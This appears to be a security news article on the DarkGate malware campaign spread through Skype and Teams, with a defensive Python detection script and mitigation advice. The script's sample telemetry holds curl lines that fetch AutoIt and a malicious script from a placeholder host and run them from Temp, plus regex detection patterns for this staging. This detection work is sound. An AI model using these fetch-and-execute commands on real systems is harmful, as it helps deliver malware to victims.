Hackers used the Teams and Skype messaging platforms to spread the DarkGate malware to targeted businesses. The DarkGate infection is initiated by a Visual Basic for Applications (VBA) loader script delivered to victims.
The Windows-based malware known as DarkGate is capable of remote access to target endpoints, file encryption, cryptocurrency mining, and credential theft. It was first publicly documented in 2018.
According to Trend Micro, DarkGate attacks were observed most often in the Americas, followed closely by Asia, the Middle East, and Africa.
To deploy and execute its malicious capabilities, DarkGate also uses AutoIt, an automation and scripting tool designed for Windows. AutoIt is a legitimate tool, but other malware families commonly use it to evade defenses and add an extra layer of obfuscation.
DarkGate Infection Chain Abusing Skype
The attacker simply used the hijacked Skype account to take over an existing conversation thread and send a message that appeared to be a PDF file but was actually a malicious VBS script.
“The threat actor abused a trusted relationship between the two organizations to deceive the recipient into executing the attached VBA script,” researchers said.
As a result, the recipient recognized the sender as belonging to a trusted external organization. Researchers observed that, in this case, the curl command was used to retrieve the legitimate AutoIt application and the associated malicious files.
Hackers Abusing Microsoft Teams Platform
In another instance, a threat actor delivered a link through a Microsoft Teams message. Here the victim was exposed to spam because the organization’s configuration allowed users to receive messages from external senders.
In the Teams variant of the attack, the attackers concealed a .LNK file. The sample that abused Teams was sent by an unidentified external sender.
“The downloaded artifacts contained both a legitimate copy of AutoIt and a maliciously compiled AutoIt script file that contained the malicious capabilities of DarkGate,” researchers said.
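Both chains described above end the same way: a script launched from a chat attachment pulls down a legitimate AutoIt interpreter plus a malicious AutoIt script with curl, and AutoIt then runs that script from a user-writable location. The following detection logic is an added example written for this article, not code from Trend Micro or from the researchers quoted; the process-event schema, the telemetry lines and the 203.0.113.10 address are constructed, and the .au3/.a3x extensions are the standard AutoIt source and compiled-script extensions.

```python
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import List, Optional, Tuple

# Script hosts that would execute a .vbs disguised as a PDF (the Skype case).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# The legitimate AutoIt interpreter and its source (.au3) / compiled (.a3x) scripts.
AUTOIT_EXE = re.compile(r"^autoit3(_x64)?\.exe$", re.IGNORECASE)
AUTOIT_ARTEFACT = re.compile(r"autoit3(_x64)?\.exe|\.au3\b|\.a3x\b", re.IGNORECASE)
# User-writable staging directories a curl download from a chat message lands in.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|Public)\\", re.IGNORECASE)

@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record: parent image, child image, child command line."""
    parent: str
    image: str
    cmdline: str

def _name(path: str) -> str:
    return PureWindowsPath(path).name.lower()

def classify(ev: ProcEvent) -> Optional[str]:
    """Return a reason if the event matches DarkGate-style staging, else None."""
    child = _name(ev.image)
    # Stage 1: the VBS loader shells out to curl for AutoIt and its script.
    if (child == "curl.exe" and _name(ev.parent) in SCRIPT_HOSTS
            and AUTOIT_ARTEFACT.search(ev.cmdline)):
        return "script host used curl to fetch AutoIt artefact"
    # Stage 2: the AutoIt interpreter runs a script dropped in a user-writable path.
    if (AUTOIT_EXE.match(child) and USER_WRITABLE.search(ev.cmdline)
            and re.search(r"\.(au3|a3x)\b", ev.cmdline, re.IGNORECASE)):
        return "AutoIt executing script from user-writable directory"
    return None

def detect(events) -> List[Tuple[ProcEvent, str]]:
    return [(ev, reason) for ev in events if (reason := classify(ev))]

# Constructed sample telemetry; 203.0.113.10 is a documentation-range placeholder.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\curl.exe",
              r"curl.exe -o C:\Users\u\AppData\Local\Temp\AutoIt3.exe http://203.0.113.10/AutoIt3.exe"),
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\curl.exe",
              r"curl.exe -o C:\Users\u\AppData\Local\Temp\s.au3 http://203.0.113.10/s.au3"),
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\Users\u\AppData\Local\Temp\AutoIt3.exe",
              r"C:\Users\u\AppData\Local\Temp\AutoIt3.exe C:\Users\u\AppData\Local\Temp\s.au3"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\curl.exe", r"curl.exe https://updates.example.com/status.json"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Program Files\AutoIt3\AutoIt3.exe",
              r'"C:\Program Files\AutoIt3\AutoIt3.exe" C:\dev\build.au3'),  # benign developer use
]

if __name__ == "__main__":
    for ev, reason in detect(SAMPLE_EVENTS):
        print(f"ALERT: {reason}: {ev.cmdline}")
```

The benign cases (an administrative curl from PowerShell, a developer running AutoIt from Program Files on a project script) are left unflagged, so the rules key on the combination of launching parent, downloaded artefact and staging location rather than on AutoIt or curl alone.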
Recommendation
Cybercriminals may use such payloads to spread malware, including cryptocurrency miners, information stealers, ransomware, and malicious or abusive remote management tools.
Organizations should control their instant messaging applications so that policies such as blocking external domains, restricting attachments, and, where practical, scanning content can be enforced.
Because legitimate credentials can be compromised, multifactor authentication (MFA) is strongly advised for securing these applications; it reduces the risk that attacks using these methods spread further.